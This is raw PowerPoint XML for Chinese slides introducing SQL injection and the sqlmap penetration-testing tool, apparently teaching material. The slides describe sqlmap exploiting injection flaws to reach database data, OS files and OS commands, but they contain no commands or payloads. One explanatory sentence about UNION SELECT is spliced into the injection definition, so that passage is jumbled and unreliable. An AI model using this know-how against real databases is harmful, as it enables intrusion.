                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0704B6F-3385-4EC7-86DC-67C9A71CE192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918039" y="1727842"/>
            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>05.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4970991" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的简单使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1996404911"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的简单使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA06EC0E-0CC2-4700-8DC5-8BB52B6B95CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="567181" y="1636745"/>
            <a:ext cx="11139735" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>是一个开源的渗透测试工具，可以用来进行自动化检测，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入漏洞，获取数据库服务器的权限。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D259783-D42C-4F78-9EFB-8DC0A6E61BE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518330" y="2731426"/>
            <a:ext cx="11188586" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>它具有功能强大的检测引擎</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="634581841"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的简单使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
